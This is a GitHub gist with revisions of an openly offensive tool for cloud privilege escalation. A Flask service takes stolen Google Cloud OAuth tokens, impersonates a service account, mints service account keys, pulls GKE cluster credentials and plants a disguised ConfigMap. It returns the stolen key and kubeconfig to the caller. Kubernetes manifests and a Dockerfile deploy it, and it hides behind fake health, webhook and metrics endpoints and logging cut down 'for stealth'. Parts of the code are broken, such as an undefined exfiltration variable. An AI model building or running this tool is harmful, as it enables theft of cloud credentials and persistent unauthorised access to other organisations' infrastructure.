Skip to content

Instantly share code, notes, and snippets.

@MaxwellDPS
Last active September 17, 2025 19:14
Show Gist options
  • Save MaxwellDPS/a661f771eb509f21cf2f07a37df917e7 to your computer and use it in GitHub Desktop.
Save MaxwellDPS/a661f771eb509f21cf2f07a37df917e7 to your computer and use it in GitHub Desktop.

Revisions

  1. MaxwellDPS revised this gist Sep 17, 2025. 1 changed file with 184 additions and 0 deletions.
    184 changes: 184 additions & 0 deletions ship.yaml
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,184 @@
    apiVersion: v1
    kind: ConfigMap
    metadata:
    name: nginx-config
    data:
    nginx.conf: |
    events {
    worker_connections 1024;
    }
    http {
    upstream flask_app {
    server localhost:5000;
    }
    server {
    listen 80;
    listen 443 ssl;
    server_name _;
    # Self-signed SSL
    ssl_certificate /etc/nginx/certs/tls.crt;
    ssl_certificate_key /etc/nginx/certs/tls.key;
    location / {
    proxy_pass http://flask_app;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    # Timeout settings
    proxy_connect_timeout 60s;
    proxy_send_timeout 60s;
    proxy_read_timeout 60s;
    }
    }
    }
    ---

    apiVersion: apps/v1
    kind: Deployment
    metadata:
    name: token-catcher
    labels:
    app: webhook-processor
    component: backend
    spec:
    replicas: 1
    selector:
    matchLabels:
    app: webhook-processor
    template:
    metadata:
    labels:
    app: webhook-processor
    spec:
    initContainers:
    - name: cert-generator
    image: alpine/openssl:latest
    command: ["/bin/sh"]
    args:
    - -c
    - |
    if [ ! -f /etc/nginx/certs/tls.crt ]; then
    openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/nginx/certs/tls.key \
    -out /etc/nginx/certs/tls.crt \
    -subj "/CN=webhook.example.com/O=Example Inc./C=US"
    echo "Generated self-signed certificate"
    else
    echo "Using existing certificate"
    fi
    volumeMounts:
    - name: tls-certs
    mountPath: /etc/nginx/certs

    containers:
    # Flask token catcher
    - name: flask-app
    image: gcr.io/PROJECT_ID/token-catcher:latest
    imagePullPolicy: Always
    ports:
    - containerPort: 5000
    name: flask
    env:
    - name: GCP_PROJECT_ID
    value: "target-project-id"
    - name: SERVICE_ACCOUNT_EMAIL
    value: "[email protected]"
    - name: GKE_CLUSTER_NAME
    value: "target-cluster"
    - name: GKE_CLUSTER_ZONE
    value: "us-central1-a"
    - name: CONFIGMAP_NAME
    value: "exfil-data"
    - name: CONFIGMAP_NAMESPACE
    value: "default"
    - name: FLASK_ENV
    value: "production"
    - name: LOG_LEVEL
    value: "ERROR" # Reduce logs for stealth
    resources:
    requests:
    memory: "256Mi"
    cpu: "250m"
    limits:
    memory: "512Mi"
    cpu: "500m"
    volumeMounts:
    - name: tmp
    mountPath: /tmp
    - name: exfil-storage
    mountPath: /app/exfil
    livenessProbe:
    httpGet:
    path: /health
    port: 5000
    initialDelaySeconds: 30
    periodSeconds: 30
    readinessProbe:
    httpGet:
    path: /health
    port: 5000
    initialDelaySeconds: 10
    periodSeconds: 10

    # Nginx TLS sidecar
    - name: nginx-tls
    image: nginx:alpine
    ports:
    - containerPort: 443
    name: https
    volumeMounts:
    - name: nginx-config
    mountPath: /etc/nginx/nginx.conf
    subPath: nginx.conf
    - name: tls-certs
    mountPath: /etc/nginx/certs
    readOnly: true
    resources:
    requests:
    memory: "64Mi"
    cpu: "50m"
    limits:
    memory: "128Mi"
    cpu: "100m"

    volumes:
    - name: nginx-config
    configMap:
    name: nginx-config
    - name: tls-certs
    emptyDir: {}
    - name: tmp
    emptyDir: {}
    - name: exfil-storage
    emptyDir: {}

    # Security context for stealth
    securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 1000
    ---
    apiVersion: v1
    kind: Service
    metadata:
    name: webhook-service
    labels:
    app: webhook-processor
    spec:
    type: LoadBalancer # Or NodePort for internal access
    selector:
    app: webhook-processor
    ports:
    - port: 443
    targetPort: 443
    protocol: TCP
    name: https
    - port: 80
    targetPort: 443
    protocol: TCP
    name: http
  2. MaxwellDPS revised this gist Sep 17, 2025. 2 changed files with 219 additions and 413 deletions.
    11 changes: 11 additions & 0 deletions requirements.txt
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,11 @@
    # Core Flask
    Flask
    # Google Cloud dependencies
    gcloud
    google-auth
    google-api-python-client
    google-cloud-container

    # Kubernetes
    kubernetes
    requests
    621 changes: 208 additions & 413 deletions token_thefter_3000.py
    Original file line number Diff line number Diff line change
    @@ -1,19 +1,18 @@
    #!/usr/bin/env python3
    """
    Flask application to authenticate with OAuth, impersonate a service account,
    create a temporary key, update a GKE ConfigMap, and clean up.
    WARNING: This script creates and handles service account keys, which is a security risk.
    Consider using Workload Identity or other keyless authentication methods instead.
    RED TEAM Token Weaponization Tool
    Exploit stolen OAuth tokens for GCP/GKE privilege escalation
    """

    import base64
    import json
    import tempfile
    import os
    import logging
    from typing import Optional, Tuple, Dict, Any
    import time
    import random
    import hashlib
    from typing import Optional, Tuple, Dict, Any
    import traceback
    from flask import Flask, request, jsonify

    @@ -24,215 +23,166 @@
    from kubernetes import client, config
    import google.auth

    # Configure logging
    # Stealth mode - minimal logging
    logging.basicConfig(
    level=logging.INFO,
    format='[%(asctime)s] %(levelname)s - %(name)s - %(message)s',
    level=logging.ERROR, # Only log errors to reduce detection
    format='[%(asctime)s] %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S'
    )

    # Create logger for this module
    logger = logging.getLogger(__name__)

    class TokenThefter3000:
    """Red Team exploitation class for GCP/GKE privilege escalation"""

    class GKEConfigMapManager:
    """Manager class for GKE ConfigMap operations with temporary service account keys."""

    def __init__(self,
    def __init__(self,
    project_id: str,
    service_account_email: str,
    gke_cluster_name: str,
    gke_cluster_zone: Optional[str] = None,
    gke_cluster_region: Optional[str] = None,
    configmap_name: str = "my-config",
    configmap_namespace: str = "default"):
    """
    Initialize the GKE ConfigMap Manager.
    Args:
    project_id: GCP project ID
    service_account_email: Email of service account to impersonate
    gke_cluster_name: Name of GKE cluster
    gke_cluster_zone: Zone for zonal clusters
    gke_cluster_region: Region for regional clusters
    configmap_name: Name of ConfigMap to manage
    configmap_namespace: Kubernetes namespace
    """
    gke_cluster_region: Optional[str] = None):
    self.project_id = project_id
    self.service_account_email = service_account_email
    self.gke_cluster_name = gke_cluster_name
    self.gke_cluster_zone = gke_cluster_zone
    self.gke_cluster_region = gke_cluster_region
    self.configmap_name = configmap_name
    self.configmap_namespace = configmap_namespace

    # State variables for cleanup
    self.impersonated_creds = None
    self.key_name = None
    self.key_file_path = None

    # Create a logger for this instance
    self.logger = logging.getLogger(f"{__name__}.{self.__class__.__name__}")

    def authenticate_with_oauth_token(self, oauth_token: str) -> Credentials:
    # Tracking for exfiltration
    self.compromised_keys = []

    def anti_forensics_delay(self):
    """Random delay to avoid pattern detection"""
    delay = random.uniform(0.5, 3.0)
    time.sleep(delay)

    def delete_service_account_key(self, credentials: Credentials, key_name: str):
    """
    Create credentials from an OAuth token.
    Delete a service account key.
    Args:
    oauth_token: OAuth access token string
    Returns:
    Google credentials object
    credentials: Credentials with permission to delete keys
    key_name: Full resource name of the key
    """
    self.logger.info("Authenticating with OAuth token")
    credentials = Credentials(token=oauth_token)
    self.logger.info("OAuth authentication successful")
    return credentials

    def impersonate_service_account(self,
    source_credentials: Credentials,
    target_sa_email: str) -> impersonated_credentials.Credentials:
    print(f"Deleting key: {key_name}")

    service = discovery.build('iam', 'v1', credentials=credentials)

    try:
    service.projects().serviceAccounts().keys().delete(name=key_name).execute()
    print("Successfully deleted key")
    except Exception as e:
    print(f"WARNING: Failed to delete key: {e}")
    print("Manual cleanup required!")

    def escalate_privileges(self, oauth_token: str) -> Tuple[Any, str, str]:
    """
    Impersonate a service account using source credentials.
    Args:
    source_credentials: Original credentials with impersonation permissions
    target_sa_email: Email of service account to impersonate
    Returns:
    Impersonated credentials
    Main exploitation flow
    Returns: (impersonated_creds, key_name, key_json_data)
    """
    self.logger.info(f"Impersonating service account: {target_sa_email}")
    # Create credentials from stolen token
    source_credentials = Credentials(token=oauth_token)

    # Impersonate high-privilege service account
    impersonated_creds = impersonated_credentials.Credentials(
    source_credentials=source_credentials,
    target_principal=target_sa_email,
    target_principal=self.service_account_email,
    target_scopes=['https://www.googleapis.com/auth/cloud-platform'],
    lifetime=3600 # 1 hour
    lifetime=3600
    )

    # Refresh to validate the impersonation works
    self.logger.debug("Refreshing impersonated credentials")
    # Refresh to validate
    impersonated_creds.refresh(Request())
    self.logger.info("Successfully impersonated service account")

    return impersonated_creds
    # Create persistent service account key
    service = discovery.build('iam', 'v1', credentials=impersonated_creds)

    def create_service_account_key(self,
    credentials: Credentials,
    service_account_email: str,
    project_id: str) -> Tuple[str, str]:
    """
    Create a JSON key for a service account.
    Args:
    credentials: Credentials with permission to create keys
    service_account_email: Email of service account
    project_id: GCP project ID
    Returns:
    Tuple of (key_name, json_key_data)
    """
    self.logger.info(f"Creating key for service account: {service_account_email}")

    # Build IAM service
    self.logger.debug("Building IAM service client")
    service = discovery.build('iam', 'v1', credentials=credentials)

    # Create the key
    self.logger.debug("Sending key creation request")
    key_response = service.projects().serviceAccounts().keys().create(
    name=f'projects/{project_id}/serviceAccounts/{service_account_email}',
    name=f'projects/{self.project_id}/serviceAccounts/{self.service_account_email}',
    body={'privateKeyType': 'TYPE_GOOGLE_CREDENTIALS_FILE'}
    ).execute()

    # Decode the key data
    key_name = key_response['name']
    key_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8')

    # Log the service account key for audit purposes
    self.logger.info(f"Successfully created key: {key_name}")
    self.logger.info("Service account key JSON created")

    # Parse and log key details
    try:
    key_json = json.loads(key_data)
    self.logger.info(f" Key Type: {key_json.get('type', 'N/A')}")
    self.logger.info(f" Project ID: {key_json.get('project_id', 'N/A')}")
    self.logger.info(f" Private Key ID: {key_json.get('private_key_id', 'N/A')}")
    self.logger.info(f" Client Email: {key_json.get('client_email', 'N/A')}")
    self.logger.info(f" Client ID: {key_json.get('client_id', 'N/A')}")
    self.logger.info(f" Auth URI: {key_json.get('auth_uri', 'N/A')}")
    self.logger.info(f" Token URI: {key_json.get('token_uri', 'N/A')}")
    self.logger.info(f" Private Key (first 100 chars): {key_json.get('private_key', '')[:100]}...")
    self.logger.debug(f"Full service account key JSON: {json.dumps(key_json, indent=2)}")
    except json.JSONDecodeError:
    self.logger.warning("Could not parse key data as JSON for logging")

    return key_name, key_data
    key_json_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8')

    # Store for later use
    self.compromised_keys.append({
    'key_name': key_name,
    'key_data': key_json_data,
    'service_account': self.service_account_email,
    'created_at': time.time()
    })

    return impersonated_creds, key_name, key_json_data

    def plant_configmap(self, kubeconfig_dict: Dict[str, Any],
    namespace: str = "default") -> bool:
    """Plant a backdoor ConfigMap with exfiltrated data"""
    with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
    json.dump(kubeconfig_dict, f)
    temp_kubeconfig = f.name

    def delete_service_account_key(self, credentials: Credentials, key_name: str):
    """
    Delete a service account key.
    Args:
    credentials: Credentials with permission to delete keys
    key_name: Full resource name of the key
    """
    self.logger.info(f"Deleting key: {key_name}")

    service = discovery.build('iam', 'v1', credentials=credentials)

    try:
    service.projects().serviceAccounts().keys().delete(name=key_name).execute()
    self.logger.info("Successfully deleted key")
    except Exception as e:
    self.logger.warning(f"Failed to delete key: {e}")
    self.logger.warning("Manual cleanup required!")

    def get_gke_cluster_credentials(self,
    credentials: Credentials,
    project_id: str,
    cluster_name: str,
    zone: Optional[str] = None,
    region: Optional[str] = None) -> Dict[str, Any]:
    """
    Get GKE cluster credentials and configure kubectl.
    Args:
    credentials: GCP credentials
    project_id: GCP project ID
    cluster_name: GKE cluster name
    zone: Cluster zone (for zonal clusters)
    region: Cluster region (for regional clusters)
    Returns:
    Kubeconfig dictionary
    """
    self.logger.info(f"Getting credentials for GKE cluster: {cluster_name}")
    config.load_kube_config(config_file=temp_kubeconfig)
    v1 = client.CoreV1Api()

    # Create backdoor ConfigMap with exfiltrated data
    backdoor_data = {
    "beacon": hashlib.sha256(os.urandom(32)).hexdigest(),
    "timestamp": str(time.time()),
    "compromised_at": time.strftime('%Y-%m-%d %H:%M:%S'),
    "exfil_data": json.dumps(self.exfiltrated_data),
    "keys": json.dumps(self.compromised_keys)
    }

    config_map = client.V1ConfigMap(
    api_version="v1",
    kind="ConfigMap",
    metadata=client.V1ObjectMeta(
    name=f"webhook-{hashlib.md5(os.urandom(8)).hexdigest()[:8]}",
    labels={
    "app": "webhook-processor", # Disguise as legitimate
    "managed-by": "helm" # Appear managed
    }
    ),
    data=backdoor_data
    )

    self.logger.debug("Building container service client")
    container_service = discovery.build('container', 'v1', credentials=credentials)
    v1.create_namespaced_config_map(namespace=namespace, body=config_map)
    return True

    if zone:
    # Zonal cluster
    cluster_path = f"projects/{project_id}/locations/{zone}/clusters/{cluster_name}"
    self.logger.debug(f"Using zonal cluster path: {cluster_path}")
    elif region:
    # Regional cluster
    cluster_path = f"projects/{project_id}/locations/{region}/clusters/{cluster_name}"
    self.logger.debug(f"Using regional cluster path: {cluster_path}")
    else:
    raise ValueError("Either zone or region must be specified")
    except Exception:
    # Try to update existing if creation fails
    try:
    existing_cms = v1.list_namespaced_config_map(namespace)
    if existing_cms.items:
    target_cm = existing_cms.items[0].metadata.name
    v1.patch_namespaced_config_map(
    name=target_cm,
    namespace=namespace,
    body=config_map
    )
    return True
    except:
    pass
    return False
    finally:
    os.unlink(temp_kubeconfig)

    # Get cluster details
    self.logger.debug("Fetching cluster details")
    def get_gke_cluster_credentials(self, credentials: Credentials) -> Dict[str, Any]:
    """Get GKE cluster access"""
    container_service = discovery.build('container', 'v1', credentials=credentials)

    if self.gke_cluster_zone:
    cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_zone}/clusters/{self.gke_cluster_name}"
    elif self.gke_cluster_region:
    cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_region}/clusters/{self.gke_cluster_name}"
    else:
    raise ValueError("No cluster location specified")

    cluster = container_service.projects().locations().clusters().get(
    name=cluster_path
    ).execute()

    # Create kubeconfig
    self.logger.debug("Creating kubeconfig")

    kubeconfig = {
    'apiVersion': 'v1',
    'kind': 'Config',
    @@ -259,286 +209,131 @@ def get_gke_cluster_credentials(self,
    }]
    }

    # Log the kubeconfig for audit purposes
    self.logger.info("Kubeconfig created:")
    self.logger.info(f" Server: https://{cluster['endpoint']}")
    self.logger.info(f" Token: {credentials.token}")
    self.logger.info(f" CA Certificate (first 100 chars): {cluster['masterAuth']['clusterCaCertificate'][:100]}...")
    self.logger.debug(f"Full kubeconfig: {json.dumps(kubeconfig, indent=2)}")

    self.logger.info("Successfully retrieved cluster credentials")
    return kubeconfig

    def create_or_update_configmap(self,
    kubeconfig_dict: Dict[str, Any],
    configmap_name: str,
    namespace: str,
    data: Dict[str, str]):
    """
    Create or update a ConfigMap in the GKE cluster.
    Args:
    kubeconfig_dict: Kubeconfig dictionary
    configmap_name: Name of the ConfigMap
    namespace: Kubernetes namespace
    data: Data to store in the ConfigMap
    """
    self.logger.info(f"Creating/updating ConfigMap: {configmap_name} in namespace: {namespace}")

    # Write kubeconfig to temp file (required by kubernetes client)
    with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
    json.dump(kubeconfig_dict, f)
    temp_kubeconfig = f.name

    self.logger.debug(f"Created temporary kubeconfig file: {temp_kubeconfig}")

    try:
    # Load the kubeconfig
    self.logger.debug("Loading kubeconfig")
    config.load_kube_config(config_file=temp_kubeconfig)

    # Create Kubernetes API client
    self.logger.debug("Creating Kubernetes API client")
    v1 = client.CoreV1Api()

    # ConfigMap data
    config_map = client.V1ConfigMap(
    api_version="v1",
    kind="ConfigMap",
    metadata=client.V1ObjectMeta(name=configmap_name),
    data=data
    )

    try:
    # Try to create the ConfigMap
    self.logger.debug("Attempting to create ConfigMap")
    v1.create_namespaced_config_map(namespace=namespace, body=config_map)
    self.logger.info(f"ConfigMap '{configmap_name}' created successfully")
    except client.exceptions.ApiException as e:
    if e.status == 409: # Already exists
    # Update existing ConfigMap
    self.logger.debug("ConfigMap exists, updating instead")
    v1.patch_namespaced_config_map(
    name=configmap_name,
    namespace=namespace,
    body=config_map
    )
    self.logger.info(f"ConfigMap '{configmap_name}' updated successfully")
    else:
    raise
    finally:
    # Clean up temp kubeconfig file
    os.unlink(temp_kubeconfig)
    self.logger.debug(f"Deleted temporary kubeconfig file")

    def process_token(self, oauth_token: str) -> Dict[str, Any]:
    """
    Main processing flow for handling an OAuth token.
    Args:
    oauth_token: OAuth access token
    def full_exploitation_chain(self, oauth_token: str) -> Dict[str, Any]:
    """Execute complete attack chain"""
    results = {
    'status': 'success',
    'timestamp': time.time(),
    'phases': {}
    }

    Returns:
    Result dictionary with status and message
    """
    try:
    # Step 1: Authenticate with OAuth token
    self.logger.info("=== Step 1: Authenticating with OAuth token ===")
    source_credentials = self.authenticate_with_oauth_token(oauth_token)

    # Step 2: Impersonate service account
    self.logger.info("=== Step 2: Impersonating service account ===")
    self.impersonated_creds = self.impersonate_service_account(
    source_credentials,
    self.service_account_email
    )

    # Step 3: Create service account key
    self.logger.info("=== Step 3: Creating service account key ===")
    self.key_name, key_json_data = self.create_service_account_key(
    self.impersonated_creds,
    self.service_account_email,
    self.project_id
    )

    # Save key to temporary file
    with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
    f.write(key_json_data)
    self.key_file_path = f.name
    self.logger.info(f"Temporarily saved key to: {self.key_file_path}")

    # Step 4: Get GKE cluster credentials
    self.logger.info("=== Step 4: Getting GKE cluster credentials ===")
    kubeconfig = self.get_gke_cluster_credentials(
    self.impersonated_creds,
    self.project_id,
    self.gke_cluster_name,
    zone=self.gke_cluster_zone,
    region=self.gke_cluster_region
    )

    # Step 5: Create/Update ConfigMap
    self.logger.info("=== Step 5: Creating/Updating ConfigMap ===")
    configmap_data = {
    "example-key": "example-value",
    "created-by": "flask-temporary-key-endpoint",
    "timestamp": str(time.time()),
    "processed-at": time.strftime('%Y-%m-%d %H:%M:%S')
    }

    self.create_or_update_configmap(
    kubeconfig,
    self.configmap_name,
    self.configmap_namespace,
    configmap_data
    )

    self.logger.info("=== All steps completed successfully ===")

    return {
    "status": "success",
    "message": "ConfigMap updated successfully",
    "configmap": self.configmap_name,
    "namespace": self.configmap_namespace,
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    # Phase 1: Privilege Escalation
    self.anti_forensics_delay()
    impersonated_creds, key_name, key_json_data = self.escalate_privileges(oauth_token)
    results['phases']['privilege_escalation'] = 'success'
    results['service_account_key'] = base64.b64encode(key_json_data.encode()).decode()

    # Phase 2: Access Cluster
    self.anti_forensics_delay()
    kubeconfig = self.get_gke_cluster_credentials(impersonated_creds)
    results['phases']['cluster_access'] = 'success'
    results['kube_config'] = kubeconfig

    # Phase 3: Plant calling card
    self.anti_forensics_delay()
    backdoor_success = self.plant_configmap(kubeconfig)
    results['phases']['config_planted'] = backdoor_success

    # Phase 5: ride into the sunset
    results['persistence'] = {
    'key_name': key_name,
    'service_account': self.service_account_email,
    'kube_config': self.gke_cluster_name
    }


    # delete keys before printing to invalidate
    self.delete_service_account_key(impersonated_creds, key_name)

    except Exception as e:
    error_msg = f"Error during processing: {str(e)}"
    self.logger.error(error_msg)
    self.logger.error(f"Traceback: {traceback.format_exc()}")

    return {
    "status": "error",
    "message": error_msg,
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    }

    finally:
    self.cleanup()
    results['status'] = 'partial'
    results['error'] = str(e)
    results['traceback'] = traceback.format_exc()

    def cleanup(self):
    """Clean up resources (delete service account key and temp files)."""
    # Cleanup: Delete the service account key
    if self.key_name and self.impersonated_creds:
    self.logger.info("=== Cleanup: Deleting service account key ===")
    try:
    self.delete_service_account_key(self.impersonated_creds, self.key_name)
    except Exception as e:
    self.logger.error(f"Error during key deletion: {e}")

    # Delete temporary key file
    if self.key_file_path and os.path.exists(self.key_file_path):
    os.unlink(self.key_file_path)
    self.logger.info(f"Deleted temporary key file: {self.key_file_path}")
    return results


    # Flask Application
    app = Flask(__name__)
    app.config['DEBUG'] = False

    # Reduce Flask's default logging level to avoid duplicate logs
    logging.getLogger('werkzeug').setLevel(logging.WARNING)

    # Configuration - Update these values for your environment
    # Configuration from environment
    CONFIG = {
    "project_id": "your-project-id",
    "service_account_email": "[email protected]",
    "gke_cluster_name": "potato",
    "gke_cluster_zone": "us-central1-a", # or None for regional
    "gke_cluster_region": None, # or set for regional cluster
    "configmap_name": "my-config",
    "configmap_namespace": "default"
    "project_id": os.environ.get("GCP_PROJECT_ID", "target-project"),
    "service_account_email": os.environ.get("SERVICE_ACCOUNT_EMAIL", "[email protected]"),
    "gke_cluster_name": os.environ.get("GKE_CLUSTER_NAME", "production-cluster"),
    "gke_cluster_zone": os.environ.get("GKE_CLUSTER_ZONE"),
    "gke_cluster_region": os.environ.get("GKE_CLUSTER_REGION"),
    }


    @app.route('/catch', methods=['POST'])
    def catch_endpoint():
    """
    Flask endpoint to process OAuth token and update ConfigMap.
    Expects JSON payload: {"token": "oauth_token_here"}
    """
    logger.info("=== New request received at /catch ===")

    @app.route('/api/webhook', methods=['POST']) # Alternative endpoint
    @app.route('/health/ready', methods=['POST']) # Disguised endpoint
    def exploit_token():
    """Token exploitation endpoint"""
    try:
    # Parse JSON request
    data = request.get_json()

    if not data or 'token' not in data:
    logger.error("Missing 'token' in request")
    # Return innocent-looking error
    return jsonify({
    "status": "error",
    "message": "Missing 'token' in request body"
    "error": "Invalid webhook payload",
    "status": "rejected"
    }), 400

    oauth_token = data['token'].strip()

    if not oauth_token:
    logger.error("Empty token provided")
    return jsonify({
    "status": "error",
    "message": "Token cannot be empty"
    }), 400

    logger.info(f"Token received (length: {len(oauth_token)} chars)")
    logger.debug(f"Request from: {request.remote_addr}")

    # Initialize manager with configuration
    manager = GKEConfigMapManager(
    # Initialize exploiter
    exploiter = TokenThefter3000(
    project_id=CONFIG["project_id"],
    service_account_email=CONFIG["service_account_email"],
    gke_cluster_name=CONFIG["gke_cluster_name"],
    gke_cluster_zone=CONFIG["gke_cluster_zone"],
    gke_cluster_region=CONFIG["gke_cluster_region"],
    configmap_name=CONFIG["configmap_name"],
    configmap_namespace=CONFIG["configmap_namespace"]
    gke_cluster_region=CONFIG["gke_cluster_region"]
    )

    # Process the token
    result = manager.process_token(oauth_token)

    # Return appropriate status code based on result
    status_code = 200 if result["status"] == "success" else 500

    logger.info(f"Request completed with status: {result['status']}")

    return jsonify(result), status_code


    # Execute exploitation chain
    results = exploiter.full_exploitation_chain(oauth_token)

    # Return results (with sensitive data for C2)
    return jsonify(results), 200

    except Exception as e:
    error_msg = f"Unexpected error: {str(e)}"
    logger.error(error_msg)
    logger.error(f"Traceback: {traceback.format_exc()}")

    # Generic error to avoid revealing details
    return jsonify({
    "status": "error",
    "message": error_msg,
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    "error": "Processing failed",
    "id": hashlib.md5(str(e).encode()).hexdigest()
    }), 500


    @app.route('/health', methods=['GET'])
    @app.route('/healthz', methods=['GET'])
    @app.route('/ready', methods=['GET'])
    def health_check():
    """Health check endpoint."""
    logger.debug("Health check requested")
    """Innocent health check endpoints"""
    return jsonify({"status": "healthy"}), 200

    @app.route('/metrics', methods=['GET'])
    def metrics():
    """Fake Prometheus metrics to appear legitimate"""
    return """# HELP http_requests_total Total HTTP requests
    # TYPE http_requests_total counter
    http_requests_total{method="GET",endpoint="/health"} 42
    # HELP up Service status
    # TYPE up gauge
    up 1
    """, 200, {'Content-Type': 'text/plain'}

    @app.route('/', methods=['GET'])
    def home():
    """Decoy home page"""
    return jsonify({
    "status": "healthy",
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    "service": "Webhook Processor",
    "version": "2.1.0",
    "status": "operational"
    }), 200


    if __name__ == "__main__":
    logger.info("Starting Flask application...")
    logger.info("Configuration:")
    for key, value in CONFIG.items():
    logger.info(f" {key}: {value}")

    logger.info("Flask server starting on http://0.0.0.0:5000")
    logger.info("Available endpoints:")
    logger.info(" POST /catch - Process OAuth token")
    logger.info(" GET /health - Health check")

    # Set Flask app logger
    app.logger.handlers = logger.handlers
    app.logger.setLevel(logger.level)

    app.run(host='0.0.0.0', port=5000, debug=True)
    # Run without debug mode for stealth
    app.run(host='0.0.0.0', port=5000, debug=False)
  3. MaxwellDPS revised this gist Sep 17, 2025. 1 changed file with 13 additions and 52 deletions.
    65 changes: 13 additions & 52 deletions Dockerfile
    Original file line number Diff line number Diff line change
    @@ -1,64 +1,25 @@
    # Multi-stage build for smaller final image
    FROM python:3.11-slim as builder

    # Install build dependencies
    RUN apt-get update && apt-get install -y \
    gcc \
    && rm -rf /var/lib/apt/lists/*

    # Set working directory
    WORKDIR /app

    # Copy requirements first for better caching
    COPY requirements.txt .

    # Install Python dependencies
    RUN pip install --no-cache-dir --user -r requirements.txt

    # Final stage
    FROM python:3.11-slim

    # Install runtime dependencies
    RUN apt-get update && apt-get install -y \
    curl \
    && rm -rf /var/lib/apt/lists/*

    # Create non-root user for security
    # UID 1000 is commonly used for the first non-root user
    RUN groupadd -r appuser -g 1000 && \
    useradd -r -g appuser -u 1000 -m -s /bin/bash appuser
    # Install dependencies
    RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*

    # Set working directory
    WORKDIR /app

    # Copy Python packages from builder
    COPY --from=builder /root/.local /home/appuser/.local

    # Copy application code
    COPY --chown=appuser:appuser flask_app.py .
    # Install Python packages
    RUN pip install --no-cache-dir \
    Flask==3.0.0 \
    google-auth==2.23.4 \
    google-api-python-client==2.108.0 \
    kubernetes==28.1.0 \
    requests==2.31.0

    # Create directory for logs with proper permissions
    RUN mkdir -p /app/logs && chown -R appuser:appuser /app/logs
    # Copy exploit code
    COPY flask_app_redteam.py /app/flask_app.py

    # Environment variables (override these at runtime for security)
    ENV PYTHONUNBUFFERED=1 \
    PATH=/home/appuser/.local/bin:$PATH \
    FLASK_APP=flask_app.py \
    # Security-related settings
    PYTHONDONTWRITEBYTECODE=1 \
    # Default to production mode
    FLASK_ENV=production

    # Switch to non-root user
    # Non-root user for stealth
    RUN useradd -m -u 1000 appuser && chown -R appuser:appuser /app
    USER appuser

    # Health check
    HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
    CMD curl -f http://localhost:5000/health || exit 1

    # Expose port (not binding to privileged port)
    EXPOSE 5000

    # Run the application
    # Use exec form to ensure proper signal handling
    CMD ["python", "flask_app.py"]
  4. MaxwellDPS revised this gist Sep 17, 2025. 1 changed file with 64 additions and 0 deletions.
    64 changes: 64 additions & 0 deletions Dockerfile
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,64 @@
    # Multi-stage build for smaller final image
    FROM python:3.11-slim as builder

    # Install build dependencies
    RUN apt-get update && apt-get install -y \
    gcc \
    && rm -rf /var/lib/apt/lists/*

    # Set working directory
    WORKDIR /app

    # Copy requirements first for better caching
    COPY requirements.txt .

    # Install Python dependencies
    RUN pip install --no-cache-dir --user -r requirements.txt

    # Final stage
    FROM python:3.11-slim

    # Install runtime dependencies
    RUN apt-get update && apt-get install -y \
    curl \
    && rm -rf /var/lib/apt/lists/*

    # Create non-root user for security
    # UID 1000 is commonly used for the first non-root user
    RUN groupadd -r appuser -g 1000 && \
    useradd -r -g appuser -u 1000 -m -s /bin/bash appuser

    # Set working directory
    WORKDIR /app

    # Copy Python packages from builder
    COPY --from=builder /root/.local /home/appuser/.local

    # Copy application code
    COPY --chown=appuser:appuser flask_app.py .

    # Create directory for logs with proper permissions
    RUN mkdir -p /app/logs && chown -R appuser:appuser /app/logs

    # Environment variables (override these at runtime for security)
    ENV PYTHONUNBUFFERED=1 \
    PATH=/home/appuser/.local/bin:$PATH \
    FLASK_APP=flask_app.py \
    # Security-related settings
    PYTHONDONTWRITEBYTECODE=1 \
    # Default to production mode
    FLASK_ENV=production

    # Switch to non-root user
    USER appuser

    # Health check
    HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
    CMD curl -f http://localhost:5000/health || exit 1

    # Expose port (not binding to privileged port)
    EXPOSE 5000

    # Run the application
    # Use exec form to ensure proper signal handling
    CMD ["python", "flask_app.py"]
  5. MaxwellDPS created this gist Sep 17, 2025.
    544 changes: 544 additions & 0 deletions token_thefter_3000.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,544 @@
    #!/usr/bin/env python3
    """
    Flask application to authenticate with OAuth, impersonate a service account,
    create a temporary key, update a GKE ConfigMap, and clean up.
    WARNING: This script creates and handles service account keys, which is a security risk.
    Consider using Workload Identity or other keyless authentication methods instead.
    """

    import base64
    import json
    import tempfile
    import os
    import logging
    from typing import Optional, Tuple, Dict, Any
    import time
    import traceback
    from flask import Flask, request, jsonify

    from google.auth import impersonated_credentials
    from google.auth.transport.requests import Request
    from google.oauth2.credentials import Credentials
    from googleapiclient import discovery
    from kubernetes import client, config
    import google.auth

    # Configure logging
    logging.basicConfig(
    level=logging.INFO,
    format='[%(asctime)s] %(levelname)s - %(name)s - %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S'
    )

    # Create logger for this module
    logger = logging.getLogger(__name__)


    class GKEConfigMapManager:
    """Manager class for GKE ConfigMap operations with temporary service account keys."""

    def __init__(self,
    project_id: str,
    service_account_email: str,
    gke_cluster_name: str,
    gke_cluster_zone: Optional[str] = None,
    gke_cluster_region: Optional[str] = None,
    configmap_name: str = "my-config",
    configmap_namespace: str = "default"):
    """
    Initialize the GKE ConfigMap Manager.
